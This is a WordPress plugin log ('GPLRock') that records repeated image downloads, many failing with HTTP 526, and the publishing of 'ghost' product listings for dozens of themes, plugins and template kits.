GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autozpro---auto-parts-woocommerce-wordpress-theme-13145.webp for product autozpro-auto-parts-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:04:28 UTC] GPLRock WARNING: Image download failed for product autozpro-auto-parts-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/autozpro---auto-parts-woocommerce-wordpress-theme-13145.webp [06-Apr-2026 09:04:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: autozpro-auto-parts-woocommerce-wordpress-theme [06-Apr-2026 09:04:28 UTC] GPLRock: Image download failed for product multicon-multi-purpose-construction-industry-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:30 UTC] GPLRock: Image download failed for product multicon-multi-purpose-construction-industry-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multicon---multi-purpose-construction-industry-theme-11417.webp for product multicon-multi-purpose-construction-industry-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:04:32 UTC] GPLRock: Image download failed for product multicon-multi-purpose-construction-industry-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:34 UTC] GPLRock: Image download failed for product multicon-multi-purpose-construction-industry-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multicon---multi-purpose-construction-industry-theme-11417.webp for product multicon-multi-purpose-construction-industry-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:04:36 UTC] GPLRock WARNING: Image download failed for product multicon-multi-purpose-construction-industry-theme. URL: https://meldwp.com/wp-content/uploads/multicon---multi-purpose-construction-industry-theme-11417.webp [06-Apr-2026 09:04:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: multicon-multi-purpose-construction-industry-theme [06-Apr-2026 09:04:37 UTC] GPLRock: Image download failed for product osmond-ecommerce-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:39 UTC] GPLRock: Image download failed for product osmond-ecommerce-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/osmond---ecommerce-magazine-wordpress-theme-30511.webp for product osmond-ecommerce-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:04:41 UTC] GPLRock: Image download failed for product osmond-ecommerce-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:43 UTC] GPLRock: Image download failed for product osmond-ecommerce-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/osmond---ecommerce-magazine-wordpress-theme-30511.webp for product osmond-ecommerce-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:04:45 UTC] GPLRock WARNING: Image download failed for product osmond-ecommerce-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/osmond---ecommerce-magazine-wordpress-theme-30511.webp [06-Apr-2026 09:04:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: osmond-ecommerce-magazine-wordpress-theme [06-Apr-2026 09:04:45 UTC] GPLRock: Image download failed for product baker-fresh-bakery-pastry-and-cake-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:47 UTC] GPLRock: Image download failed for product baker-fresh-bakery-pastry-and-cake-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/baker---fresh-bakery-pastry-and-cake-shop-wordpress-theme-8280.webp for product baker-fresh-bakery-pastry-and-cake-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:04:50 UTC] GPLRock: Image download failed for product baker-fresh-bakery-pastry-and-cake-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:52 UTC] GPLRock: Image download failed for product baker-fresh-bakery-pastry-and-cake-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/baker---fresh-bakery-pastry-and-cake-shop-wordpress-theme-8280.webp for product baker-fresh-bakery-pastry-and-cake-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:04:54 UTC] GPLRock WARNING: Image download failed for product baker-fresh-bakery-pastry-and-cake-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/baker---fresh-bakery-pastry-and-cake-shop-wordpress-theme-8280.webp [06-Apr-2026 09:04:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: baker-fresh-bakery-pastry-and-cake-shop-wordpress-theme [06-Apr-2026 09:04:54 UTC] GPLRock: Image download failed for product dan-creative-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:56 UTC] GPLRock: Image download failed for product dan-creative-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:04:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dan--creative-photography-wordpress-theme-5726.webp for product dan-creative-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:04:58 UTC] GPLRock: Image download failed for product dan-creative-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:00 UTC] GPLRock: Image download failed for product dan-creative-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dan--creative-photography-wordpress-theme-5726.webp for product dan-creative-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:05:02 UTC] GPLRock WARNING: Image download failed for product dan-creative-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dan--creative-photography-wordpress-theme-5726.webp [06-Apr-2026 09:05:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dan-creative-photography-wordpress-theme [06-Apr-2026 09:05:03 UTC] GPLRock: Image download failed for product yamal-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:05 UTC] GPLRock: Image download failed for product yamal-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yamal---blog--magazine-wordpress-theme-10309.webp for product yamal-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:05:07 UTC] GPLRock: Image download failed for product yamal-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:09 UTC] GPLRock: Image download failed for product yamal-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yamal---blog--magazine-wordpress-theme-10309.webp for product yamal-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:05:11 UTC] GPLRock WARNING: Image download failed for product yamal-blog-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/yamal---blog--magazine-wordpress-theme-10309.webp [06-Apr-2026 09:05:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: yamal-blog-magazine-wordpress-theme [06-Apr-2026 09:05:11 UTC] GPLRock: Image download failed for product gluson-digital-theme-for-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:13 UTC] GPLRock: Image download failed for product gluson-digital-theme-for-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gluson---digital-theme-for-woocommerce-wordpress-10917.webp for product gluson-digital-theme-for-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:05:16 UTC] GPLRock: Image download failed for product gluson-digital-theme-for-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:18 UTC] GPLRock: Image download failed for product gluson-digital-theme-for-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gluson---digital-theme-for-woocommerce-wordpress-10917.webp for product gluson-digital-theme-for-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:05:20 UTC] GPLRock WARNING: Image download failed for product gluson-digital-theme-for-woocommerce-wordpress. URL: https://meldwp.com/wp-content/uploads/gluson---digital-theme-for-woocommerce-wordpress-10917.webp [06-Apr-2026 09:05:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gluson-digital-theme-for-woocommerce-wordpress [06-Apr-2026 09:05:20 UTC] GPLRock: Image downloaded successfully for product aimo-ai-agency-technology-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-324cf3ac.webp [06-Apr-2026 09:05:20 UTC] GPLRock: Using pre-downloaded image for product aimo-ai-agency-technology-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-324cf3ac.webp [06-Apr-2026 09:05:20 UTC] GPLRock: Ghost product published with image - Product ID: aimo-ai-agency-technology-wordpress-theme [06-Apr-2026 09:05:20 UTC] GPLRock: Image download failed for product mousiqua-music-band-musician-onepage-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:22 UTC] GPLRock: Image download failed for product mousiqua-music-band-musician-onepage-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mousiqua--music-band--musician-onepage-wordpress-theme-3244.webp for product mousiqua-music-band-musician-onepage-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:05:25 UTC] GPLRock: Image download failed for product mousiqua-music-band-musician-onepage-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:27 UTC] GPLRock: Image download failed for product mousiqua-music-band-musician-onepage-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mousiqua--music-band--musician-onepage-wordpress-theme-3244.webp for product mousiqua-music-band-musician-onepage-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:05:29 UTC] GPLRock WARNING: Image download failed for product mousiqua-music-band-musician-onepage-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mousiqua--music-band--musician-onepage-wordpress-theme-3244.webp [06-Apr-2026 09:05:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mousiqua-music-band-musician-onepage-wordpress-theme [06-Apr-2026 09:05:29 UTC] GPLRock: Image download failed for product tastyc-cafe-restaurant-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:31 UTC] GPLRock: Image download failed for product tastyc-cafe-restaurant-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tastyc---cafe-restaurant-theme-9831.webp for product tastyc-cafe-restaurant-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:05:33 UTC] GPLRock: Image download failed for product tastyc-cafe-restaurant-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:35 UTC] GPLRock: Image download failed for product tastyc-cafe-restaurant-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:05:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tastyc---cafe-restaurant-theme-9831.webp for product tastyc-cafe-restaurant-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:05:37 UTC] GPLRock WARNING: Image download failed for product tastyc-cafe-restaurant-theme. URL: https://meldwp.com/wp-content/uploads/tastyc---cafe-restaurant-theme-9831.webp [06-Apr-2026 09:05:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tastyc-cafe-restaurant-theme [06-Apr-2026 09:08:01 UTC] GPLRock: Image downloaded successfully for product kenchiku-architecture-interior-design-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d455daa3.webp [06-Apr-2026 09:08:01 UTC] GPLRock: Using pre-downloaded image for product kenchiku-architecture-interior-design-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d455daa3.webp [06-Apr-2026 09:08:01 UTC] GPLRock: Ghost product published with image - Product ID: kenchiku-architecture-interior-design-elementor-template-kit [06-Apr-2026 09:08:03 UTC] GPLRock: Image downloaded successfully for product kebun-garden-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6a62f58a.webp [06-Apr-2026 09:08:03 UTC] GPLRock: Using pre-downloaded image for product kebun-garden-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6a62f58a.webp [06-Apr-2026 09:08:03 UTC] GPLRock: Ghost product published with image - Product ID: kebun-garden-service-elementor-template-kit [06-Apr-2026 09:08:04 UTC] GPLRock: Image downloaded successfully for product kaywo-furniture-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-95ec3f33.webp [06-Apr-2026 09:08:04 UTC] GPLRock: Using pre-downloaded image for product kaywo-furniture-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-95ec3f33.webp [06-Apr-2026 09:08:04 UTC] GPLRock: Ghost product published with image - Product ID: kaywo-furniture-services-elementor-template-kit [06-Apr-2026 09:08:06 UTC] GPLRock: Image downloaded successfully for product kawan-law-firm-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e202a677.webp [06-Apr-2026 09:08:06 UTC] GPLRock: Using pre-downloaded image for product kawan-law-firm-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e202a677.webp [06-Apr-2026 09:08:06 UTC] GPLRock: Ghost product published with image - Product ID: kawan-law-firm-elementor-template-kit [06-Apr-2026 09:08:07 UTC] GPLRock: Image downloaded successfully for product katy-kids-birthday-party-planner-invitation-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-79da8c74.webp [06-Apr-2026 09:08:07 UTC] GPLRock: Using pre-downloaded image for product katy-kids-birthday-party-planner-invitation-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-79da8c74.webp [06-Apr-2026 09:08:07 UTC] GPLRock: Ghost product published with image - Product ID: katy-kids-birthday-party-planner-invitation-elementor-template-kit [06-Apr-2026 09:08:08 UTC] GPLRock: Image downloaded successfully for product kate-steve-wedding-invitation-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e70d6d7e.webp [06-Apr-2026 09:08:08 UTC] GPLRock: Using pre-downloaded image for product kate-steve-wedding-invitation-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e70d6d7e.webp [06-Apr-2026 09:08:08 UTC] GPLRock: Ghost product published with image - Product ID: kate-steve-wedding-invitation-elementor-template-kit [06-Apr-2026 09:08:10 UTC] GPLRock: Image downloaded successfully for product kasal-wedding-event-planner-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c2b1c01d.webp [06-Apr-2026 09:08:10 UTC] GPLRock: Using pre-downloaded image for product kasal-wedding-event-planner-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c2b1c01d.webp [06-Apr-2026 09:08:10 UTC] GPLRock: Ghost product published with image - Product ID: kasal-wedding-event-planner-elementor-template-kit [06-Apr-2026 09:08:11 UTC] GPLRock: Image downloaded successfully for product karma-blog-magazine-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d7138793.webp [06-Apr-2026 09:08:11 UTC] GPLRock: Using pre-downloaded image for product karma-blog-magazine-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d7138793.webp [06-Apr-2026 09:08:11 UTC] GPLRock: Ghost product published with image - Product ID: karma-blog-magazine-elementor-template-kit [06-Apr-2026 09:08:13 UTC] GPLRock: Image downloaded successfully for product kargo-delivery-storage-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0d712fe5.webp [06-Apr-2026 09:08:13 UTC] GPLRock: Using pre-downloaded image for product kargo-delivery-storage-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0d712fe5.webp [06-Apr-2026 09:08:13 UTC] GPLRock: Ghost product published with image - Product ID: kargo-delivery-storage-template-kit [06-Apr-2026 09:08:14 UTC] GPLRock: Image downloaded successfully for product kareta-car-rental-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5124cbe8.webp [06-Apr-2026 09:08:14 UTC] GPLRock: Using pre-downloaded image for product kareta-car-rental-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5124cbe8.webp [06-Apr-2026 09:08:14 UTC] GPLRock: Ghost product published with image - Product ID: kareta-car-rental-services-elementor-template-kit [06-Apr-2026 09:16:37 UTC] GPLRock: Image downloaded successfully for product page-intro-for-elementor-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4ced900c.jpg [06-Apr-2026 09:16:37 UTC] GPLRock: Using pre-downloaded image for product page-intro-for-elementor-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4ced900c.jpg [06-Apr-2026 09:16:37 UTC] GPLRock: Ghost product published with image - Product ID: page-intro-for-elementor-wordpress-plugin [06-Apr-2026 09:16:39 UTC] GPLRock: Image downloaded successfully for product geodirectory-list-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d98b0494.jpg [06-Apr-2026 09:16:39 UTC] GPLRock: Using pre-downloaded image for product geodirectory-list-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d98b0494.jpg [06-Apr-2026 09:16:39 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-list-manager [06-Apr-2026 09:16:41 UTC] GPLRock: Image downloaded successfully for product the-events-calendar-shortcode-and-templates-pro-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9fd50a97.jpg [06-Apr-2026 09:16:41 UTC] GPLRock: Using pre-downloaded image for product the-events-calendar-shortcode-and-templates-pro-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9fd50a97.jpg [06-Apr-2026 09:16:41 UTC] GPLRock: Ghost product published with image - Product ID: the-events-calendar-shortcode-and-templates-pro-wordpress-plugin [06-Apr-2026 09:16:42 UTC] GPLRock: Image downloaded successfully for product monsterinsights-forms-tracking-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a82db237.jpg [06-Apr-2026 09:16:42 UTC] GPLRock: Using pre-downloaded image for product monsterinsights-forms-tracking-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a82db237.jpg [06-Apr-2026 09:16:42 UTC] GPLRock: Ghost product published with image - Product ID: monsterinsights-forms-tracking-addon [06-Apr-2026 09:16:44 UTC] GPLRock: Image downloaded successfully for product hazel-multi-concept-creative-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-440a9335.jpg [06-Apr-2026 09:16:44 UTC] GPLRock: Using pre-downloaded image for product hazel-multi-concept-creative-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-440a9335.jpg [06-Apr-2026 09:16:44 UTC] GPLRock: Ghost product published with image - Product ID: hazel-multi-concept-creative-wordpress-theme [06-Apr-2026 09:16:45 UTC] GPLRock: Image downloaded successfully for product woocommerce-psigate-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6e0843ad.jpg [06-Apr-2026 09:16:45 UTC] GPLRock: Using pre-downloaded image for product woocommerce-psigate-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6e0843ad.jpg [06-Apr-2026 09:16:45 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-psigate-gateway [06-Apr-2026 09:16:47 UTC] GPLRock: Image downloaded successfully for product studiopress-lifestyle-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c2523c22.jpg [06-Apr-2026 09:16:47 UTC] GPLRock: Using pre-downloaded image for product studiopress-lifestyle-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c2523c22.jpg [06-Apr-2026 09:16:47 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-lifestyle-pro-genesis-wordpress-theme [06-Apr-2026 09:16:48 UTC] GPLRock: Image downloaded successfully for product monsterinsights-amp-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dcc840d1.jpg [06-Apr-2026 09:16:48 UTC] GPLRock: Using pre-downloaded image for product monsterinsights-amp-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dcc840d1.jpg [06-Apr-2026 09:16:48 UTC] GPLRock: Ghost product published with image - Product ID: monsterinsights-amp-addon [06-Apr-2026 09:16:50 UTC] GPLRock: Image downloaded successfully for product memberpress-mad-mimi (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-26888fd3.jpg [06-Apr-2026 09:16:50 UTC] GPLRock: Using pre-downloaded image for product memberpress-mad-mimi: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-26888fd3.jpg [06-Apr-2026 09:16:50 UTC] GPLRock: Ghost product published with image - Product ID: memberpress-mad-mimi [06-Apr-2026 09:16:51 UTC] GPLRock: Image downloaded successfully for product give-payfast-payment-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-260ff792.jpg [06-Apr-2026 09:16:51 UTC] GPLRock: Using pre-downloaded image for product give-payfast-payment-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-260ff792.jpg [06-Apr-2026 09:16:51 UTC] GPLRock: Ghost product published with image - Product ID: give-payfast-payment-gateway [06-Apr-2026 09:19:02 UTC] GPLRock: Image download failed for product pixiehuge-esports-gaming-theme-for-clans-organizations (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:04 UTC] GPLRock: Image download failed for product pixiehuge-esports-gaming-theme-for-clans-organizations (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pixiehuge--esports-gaming-theme-for-clans--organizations-28356.webp for product pixiehuge-esports-gaming-theme-for-clans-organizations after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:19:06 UTC] GPLRock: Image download failed for product pixiehuge-esports-gaming-theme-for-clans-organizations (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:08 UTC] GPLRock: Image download failed for product pixiehuge-esports-gaming-theme-for-clans-organizations (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pixiehuge--esports-gaming-theme-for-clans--organizations-28356.webp for product pixiehuge-esports-gaming-theme-for-clans-organizations after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:19:11 UTC] GPLRock WARNING: Image download failed for product pixiehuge-esports-gaming-theme-for-clans-organizations. URL: https://meldwp.com/wp-content/uploads/pixiehuge--esports-gaming-theme-for-clans--organizations-28356.webp [06-Apr-2026 09:19:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pixiehuge-esports-gaming-theme-for-clans-organizations [06-Apr-2026 09:19:11 UTC] GPLRock: Image download failed for product la-evento-an-organized-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:13 UTC] GPLRock: Image download failed for product la-evento-an-organized-event-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/la-evento---an-organized-event-wordpress-theme-16448.webp for product la-evento-an-organized-event-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:19:15 UTC] GPLRock: Image download failed for product la-evento-an-organized-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:17 UTC] GPLRock: Image download failed for product la-evento-an-organized-event-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/la-evento---an-organized-event-wordpress-theme-16448.webp for product la-evento-an-organized-event-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:19:19 UTC] GPLRock WARNING: Image download failed for product la-evento-an-organized-event-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/la-evento---an-organized-event-wordpress-theme-16448.webp [06-Apr-2026 09:19:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: la-evento-an-organized-event-wordpress-theme [06-Apr-2026 09:19:19 UTC] GPLRock: Image downloaded successfully for product viho-html-react-js-angular-nuxt-js-next-js-vue-js-django-net-core-laravel-dashboard (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-445db839.webp [06-Apr-2026 09:19:19 UTC] GPLRock: Using pre-downloaded image for product viho-html-react-js-angular-nuxt-js-next-js-vue-js-django-net-core-laravel-dashboard: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-445db839.webp [06-Apr-2026 09:19:19 UTC] GPLRock: Ghost product published with image - Product ID: viho-html-react-js-angular-nuxt-js-next-js-vue-js-django-net-core-laravel-dashboard [06-Apr-2026 09:19:20 UTC] GPLRock: Image download failed for product chrie-beauty-salon-spa-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:22 UTC] GPLRock: Image download failed for product chrie-beauty-salon-spa-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chrie--beauty-salon-spa-wordpress-8220.webp for product chrie-beauty-salon-spa-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:19:24 UTC] GPLRock: Image download failed for product chrie-beauty-salon-spa-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:26 UTC] GPLRock: Image download failed for product chrie-beauty-salon-spa-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 09:19:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chrie--beauty-salon-spa-wordpress-8220.webp for product chrie-beauty-salon-spa-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 09:19:28 UTC] GPLRock WARNING: Image download failed for product chrie-beauty-salon-spa-wordpress. URL: https://meldwp.com/wp-content/uploads/chrie--beauty-salon-spa-wordpress-8220.webp [06-Apr-2026 09:19:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: chrie-beauty-salon-spa-wordpress [06-Apr-2026 09:19:28 UTC] GPLRock: Image download failed for product derma-clear-beauty-cosmetics-skincare-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: 